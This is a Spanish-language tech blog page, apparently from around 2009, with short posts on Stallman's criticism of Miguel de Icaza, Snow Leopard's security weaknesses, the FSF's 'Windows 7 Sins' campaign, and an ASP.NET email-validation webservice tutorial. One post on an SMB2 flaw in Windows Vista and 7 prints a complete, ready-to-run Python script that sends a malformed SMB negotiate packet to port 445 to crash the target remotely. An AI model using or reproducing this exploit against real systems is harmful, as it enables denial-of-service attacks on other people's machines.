Linux, computación y más…

En las celebraciones del Software Freedom Day de este año en la ciudad de Boston (EE.UU.) Richard Stallman respondió algunas muy interesantes preguntas de donde indudablemente se destaca su afirmación de que Miguel de Icaza: “is basically a traitor to the Free Software community” .

A la renuncia de Sam Ramji de la fundación codeplex, se dice que Miguel de Icaza podría tomar el mando de ésta fundación ya que es miembro de ésta organización fundada por Microsoft.

En la conferencia, Stallman llegó a decir que la participación de Miguel de Icaza en el proyecto(codeplex) no da mucha confianza ya que él es un apologista de Microsoft.

Sin duda, éste tema da mucho de que hablar, los comentarios de los linuxeros son muy diversos, unos apoyan a Icazay otros apoyan a Stallman, Icaza ha sido muy criticado por estar cerca de la empresa Microsoft por proyectos como Mono y declaraciones como : “GNOME debe estar basado en .NET”.

Ésta decisión de Icaza de pertenecer a un proyecto de Microsoft puede tener sus puntos a favor y puntos encontra, la fundación codeplex no suena tan mal, se trata de una organización en dónde promueve a empresas y comunidades aportar con sus aplicaciones de manera abierta, ésto sin duda, puede acarrear cosas buenas para la comunidad de Linux, ya que muchos de los proyectos posiblemente pueden correr bien sobre Linux utilizando mono.

La competencia es grande , el software libre y opensorce estan creciendo bastante, por lo que Microsoft inteligentemente se tiene que aliar a éstos conceptos, aunque claro, Microsoft velará por sus intereses.

Segun dailytech.com, algunos expertos en seguridad y reconocidos hackers alertan que el último Sistema Operativo presentado por la manzana blanca, Snow Leopard, es menos seguro que el próximo Sistema Operativo de Microsoft, Windows 7.

Estas afirmaciones se basan en el hecho de que Snow Leopard trae desactivado por defecto el cortafuegos (aunque el usuario lo puede volver a activar), que las actualizaciones no sean totalmente automáticas y que Safari incluye un sistema antiphising muy débil.

A lo anterior se debe agregar el hecho de que Apple incluyó en Snow Leopard una versión de Adobe Flash que era vulnerable a ataques, aunque esto último fue solucionado con la primera actualización del Sistema Operativo.

El reconocido hacker Charlie Miller ha criticado que Snow Leopard no incluya ninguna modificación relacionada con la forma como el sistema asigna la memoria disponible en forma aleatoria, una debilidad que ya era conocida en versiones anteriores de Mac OS y que en este último Sistema Operativo sigue igual. Es por esta razón que es mucho más fácil para los hackers realizar un ataque contra Snow Leopard que contra Windows 7.

Claro que no todo han sido críticas, porque Miller reconoce las mejoras de seguridad introducidas en QuickTime X (el que fue re-escrito completamente) y la efectiva implementación del sistema de prevención de ejecución de datos (DEP), un sistema que protege el uso de la memoria y que se encuentra integrado en Windows 7.

Vulnerabilidad encontrada en el procotolo SMB en windows vista y windows 7, con éste exploit el atacante puede congelar(crash) remotamente cualquiera de éstos 2 sistemas operativos.

Solución?

Por el momento no la hay, simplemente cerrar puertos del SMB.

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> =) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Se ha lanzado una nueva campaña por parte de la FSF (Free software Foundation), la cuál mediante 7 puntos, trata de explicar los problemas a los cuales estamos sujetos si utilizamos el nuevo sistema operativo de Microsoft, windows 7, la página de dicha campaña es : windows7sins.org.

Un colega linuxero (revapaus.org) ha traducido los puntos que vienen en la página oficial de la campaña, reutilizo su texto:

Los pecados de Windows 7 (es un juego de palabras por lo que se puede entender también como los 7 pecados de Windows): El caso en contra de Microsoft y el software propietario.

La nueva versión del Sistema operativo de Microsoft, Windows 7, tiene el mismo problema que tenían Vista, XP y todas las versiones anteriores – son software propietario. Los usuarios no tienen permitido compartir o modificar el software Windows, o examinar como funciona por dentro.

El hecho de que Windows 7 sea propietario significa que Microsoft tiene control legal sobre sus usuarios, a través de una combinación de copyrights, contratos y patentes. Microsoft utiliza este poder para abusar de los usuarios de computadoras. En windows7sins.org, the Free Software Foundation enumera siete ejemplos de abuso cometidos por Microsoft.

1. Envenena la educación: Hoy, la mayoría de los niños para quienes su educación involucra computadoras están siendo enseñados a utilizar el producto de una empresa: el producto de Microsoft.
2. Invade la privacidad: Microsoft utiliza software con nombres capciosos como Windows Genuine Advantage para inspeccionar los contenidos de los discos duros de los usuarios. El acuerdo de licencia que los usuarios deben firmar antes de poder usar Windows avisa que Microsoft reclama el derecho de hacer esto sin ninguna advertencia.
3. Practicas monopolicas: Casi todas las computadoras adquiridas tienen Windows pre-instalado – Pero no por elección. Microsoft establece directrices a los vendedores de hardware, quienes no ofrecerán PC’s sin Windows instalado en ellas. Incluso las computadoras disponibles con otros sistemas operativos pre-instalados como GNU/Linux suelen tener Windows en un principio.
4. Lock-in: Microsoft intenta forzar la actualización de sus usuarios, dejando sin soporte versiones anteriores de Windows y Office, e inflando los requerimientos de hardware. Para muchas personas, esto implica desechar computadoras que funcionan solamente por que no cubren los requisitos necesarios para las nuevas versiones de Windows.
5. Estándares abusivos: Microsoft ha intentado detener la libre estandarización de los formatos de documento, por que los estándares como el Open Document Format mermarán el control que ahora tienen sobre los usuarios de los formatos propietarios de Word. Lo han intentado con prácticas miserables, incluyendo el soborno a oficiales, en su intento por detener estos esfuerzos.
6. Impulsar la Gestión de Restricciones Digitales(DRM): Con el Windows Media Player, Microsoft trabaja coludido con las grandes empresas de multimedia para imponer restricciones a la copia y reproducción de media en su sistema operativo. Por ejemplo, por petición de la NBC Microsoft previene a los usuarios de Windows de grabar programas televisivos que tienen derecho a grabar.
7. Amenazar la seguridad de los usuarios: Windows tienen una larga historia de vulnerabilidades de seguridad, permitiendo la propagación de los virus y la toma de control de las computadoras de los usuarios por parte de terceros para el envío de spam. Como el software es secreto, todos los usuarios dependen de Microsoft para resolver estos problemas – pero en fondo Microsoft tiene sus propios intereses de seguridad, que no son los de sus usuarios.

Ustedes ¿qué opinan?, creen que con éstas campañas de la FSF las personas dejen de utilizar éstos sistemas operativos?, ¿Le ven futuro a Windows 7?, ¿Fracasará igual que Windows Vista?

En éste tutorial, veremos como crear un webservice que contenga un método para validar si una dirección de emial es válida ó no. También crearemos una aplicación web en asp.net para consumir el webservice. En ésta ocasión utilizaremos VS2008 con el framework 3.5 SP1.

Lo primero que haremos será crear un sitio web del tipo webservice, para ello vamos a Fila->New-WebSite, en la ventana que nos aparece seleccionamos ASP.NET WebService:

Por default nos creará un método que regresa un simple “Hola Mundo”, modificaremos ese método y agregamos lo siguiente:

[WebMethod]
public bool EmailValidation(string email)
  {
string expresion = "\\w+([-+.']\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*";
if (System.Text.RegularExpressions.Regex.IsMatch(email, expresion))
      {
if (System.Text.RegularExpressions.Regex.Replace(email, expresion,String.Empty).Length == 0)
      { return true; }
       else
      { return false; }
      }
     else
      { return false; }
    }

Quedaría de la siguiente manera:

Con ésto ya tenemos creado nuestro webservice con un método que nos validará un email, ahora agregaremos un nuevo proyecto a nuestra solución, será un proyecto web asp.net, para ello, vamos a File->Add->New Project y seleccionamos ASP.NET Web Application:

Lo primero que debemos hacer es agregar la referencia del webservice a nuestro nuevo proyecto web, para ello damos click derecho en Referencia y luego Agregar referencia web…

Nos aparecerá una ventana para seleccionar la fuente del webservice, seleccionaremos WebService en this solution:

Ahí nos aparecerá el webservice que habíamos creado, lo seleccionamos y le damos Add Reference:

Una vez que ya está agregada la referencia, vamos a modificar el archivo Default.aspx y le ponemos un TextBox y un Botón:

Ahora en el evento OnClick del botón, agregamos el siguiente código:

 localhost.Service EmailService = new localhost.Service();
   bool Valid = EmailService.EmailValidation(TextBox1.Text);
       if (Valid)
          Response.Write("Email Correcto");
         else
          Response.Write("Email Incorrecto");

Quedaría de la siguiente manera:

Para correr el proyecto, configuramos el proyecto webapplication para que arranque de inicio , dando click derecho en el proyecto y le damos en Set as StartUp Project:

Listo!, probamos:

Si quieres hacer un webservice libre utilizando Mono, puedes visitar mi artículo anterior: Crear un webservice en monodevelop